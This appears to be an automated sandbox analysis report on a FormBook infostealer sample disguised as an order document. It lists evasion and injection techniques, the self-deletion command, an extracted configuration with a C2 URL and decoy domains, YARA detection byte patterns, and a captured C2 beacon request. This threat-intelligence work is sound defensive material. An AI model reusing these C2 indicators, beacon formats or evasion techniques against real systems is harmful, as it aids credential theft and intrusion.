Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report document de commande.scr

Overview

General Information

Sample Name:document de commande.scr (renamed file extension from scr to exe)
Analysis ID:502021
MD5:1823dce627d29f5d4985501267f7ad9f
SHA1:1ce10042fccf2c8fcb2b0a93723f24b6c3b4ffb3
SHA256:c14ba2023f89dc57df157690e40042b8b090906257c59b6e5834b2212cd3142e
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • document de commande.exe (PID: 3116 cmdline: 'C:\Users\user\Desktop\document de commande.exe' MD5: 1823DCE627D29F5D4985501267F7AD9F)
    • document de commande.exe (PID: 6756 cmdline: C:\Users\user\Desktop\document de commande.exe MD5: 1823DCE627D29F5D4985501267F7AD9F)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 6420 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 5888 cmdline: /c del 'C:\Users\user\Desktop\document de commande.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.yourherogarden.net/dn7r/"], "decoy": ["eventphotographerdfw.com", "thehalalcoinstaking.com", "philipfaziofineart.com", "intercoh.com", "gaiaseyephotography.com", "chatbotforrealestate.com", "lovelancemg.com", "marlieskasberger.com", "elcongoenespanol.info", "lepirecredit.com", "distribution-concept.com", "e99game.com", "exit11festival.com", "twodollartoothbrushclub.com", "cocktailsandlawn.com", "performimprove.network", "24horas-telefono-11840.com", "cosmossify.com", "kellenleote.com", "perovskite.energy", "crosschain.services", "xiwanghe.com", "mollycayton.com", "bonipay.com", "uuwyxc.com", "viberiokno-online.com", "mobceo.com", "menzelna.com", "tiffaniefoster.com", "premiumautowesthartford.com", "ownhome.house", "bestmartinshop.com", "splashstoreofficial.com", "guidemining.com", "ecshopdemo.com", "bestprinting1.com", "s-circle2020.com", "ncagency.info", "easydigitalzone.com", "reikiforthecollective.com", "theknottteam.com", "evolvedpixel.com", "japxo.online", "ryansqualityrenovations.com", "dentimagenquito.net", "pantherprints.co.uk", "apoporangi.com", "thietkemietvuon.net", "ifernshop.com", "casaruralesgranada.com", "camp-3saumons.com", "eddsucks.com", "blwcd.com", "deldlab.com", "susanperb.com", "autosanitizingsolutions.com", "femhouse.com", "ironcageclash.com", "thekinghealer.com", "shaghayeghbovand.com", "advertfaces.com", "lonriley.com", "mased-world.online", "mythicspacex.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.document de commande.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.document de commande.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.document de commande.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        3.2.document de commande.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.document de commande.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 3 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.yourherogarden.net/dn7r/"], "decoy": ["eventphotographerdfw.com", "thehalalcoinstaking.com", "philipfaziofineart.com", "intercoh.com", "gaiaseyephotography.com", "chatbotforrealestate.com", "lovelancemg.com", "marlieskasberger.com", "elcongoenespanol.info", "lepirecredit.com", "distribution-concept.com", "e99game.com", "exit11festival.com", "twodollartoothbrushclub.com", "cocktailsandlawn.com", "performimprove.network", "24horas-telefono-11840.com", "cosmossify.com", "kellenleote.com", "perovskite.energy", "crosschain.services", "xiwanghe.com", "mollycayton.com", "bonipay.com", "uuwyxc.com", "viberiokno-online.com", "mobceo.com", "menzelna.com", "tiffaniefoster.com", "premiumautowesthartford.com", "ownhome.house", "bestmartinshop.com", "splashstoreofficial.com", "guidemining.com", "ecshopdemo.com", "bestprinting1.com", "s-circle2020.com", "ncagency.info", "easydigitalzone.com", "reikiforthecollective.com", "theknottteam.com", "evolvedpixel.com", "japxo.online", "ryansqualityrenovations.com", "dentimagenquito.net", "pantherprints.co.uk", "apoporangi.com", "thietkemietvuon.net", "ifernshop.com", "casaruralesgranada.com", "camp-3saumons.com", "eddsucks.com", "blwcd.com", "deldlab.com", "susanperb.com", "autosanitizingsolutions.com", "femhouse.com", "ironcageclash.com", "thekinghealer.com", "shaghayeghbovand.com", "advertfaces.com", "lonriley.com", "mased-world.online", "mythicspacex.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: document de commande.exeVirustotal: Detection: 31%Perma Link
          Source: document de commande.exeMetadefender: Detection: 22%Perma Link
          Source: document de commande.exeReversingLabs: Detection: 50%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.document de commande.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.document de commande.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, type: MEMORY
          Source: 3.2.document de commande.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: document de commande.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: document de commande.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: chkdsk.pdbGCTL source: document de commande.exe, 00000003.00000002.752978247.0000000001A10000.00000040.00020000.sdmp
          Source: Binary string: chkdsk.pdb source: document de commande.exe, 00000003.00000002.752978247.0000000001A10000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: document de commande.exe, 00000003.00000002.753021342.0000000001A20000.00000040.00000001.sdmp, chkdsk.exe, 00000009.00000002.932346690.00000000051DF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: document de commande.exe, 00000003.00000002.753021342.0000000001A20000.00000040.00000001.sdmp, chkdsk.exe, 00000009.00000002.932346690.00000000051DF000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 4x nop then jmp 06AF0D4Bh0_2_06AF0412
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 4x nop then pop edi3_2_00417DBC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi9_2_04D77DBC

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.ecshopdemo.com
          Source: C:\Windows\explorer.exeDomain query: www.gaiaseyephotography.com
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.186 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.casaruralesgranada.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.yourherogarden.net/dn7r/
          Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
          Source: global trafficHTTP traffic detected: GET /dn7r/?iR-Tzb=13xKs1CRhM6TBkg9XZx8aHv4jtF4dS/6+j4tMM4NOYQaHb7QxT/SxMO9vodW3MT/P4hK&qVV8Aj=6lIHIj6PDtc HTTP/1.1Host: www.casaruralesgranada.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Wed, 13 Oct 2021 12:28:53 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: document de commande.exe, 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownDNS traffic detected: queries for: www.ecshopdemo.com
          Source: global trafficHTTP traffic detected: GET /dn7r/?iR-Tzb=13xKs1CRhM6TBkg9XZx8aHv4jtF4dS/6+j4tMM4NOYQaHb7QxT/SxMO9vodW3MT/P4hK&qVV8Aj=6lIHIj6PDtc HTTP/1.1Host: www.casaruralesgranada.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.document de commande.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.document de commande.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 3.2.document de commande.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.document de commande.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.document de commande.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.document de commande.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: document de commande.exe
          Source: document de commande.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 3.2.document de commande.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.document de commande.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
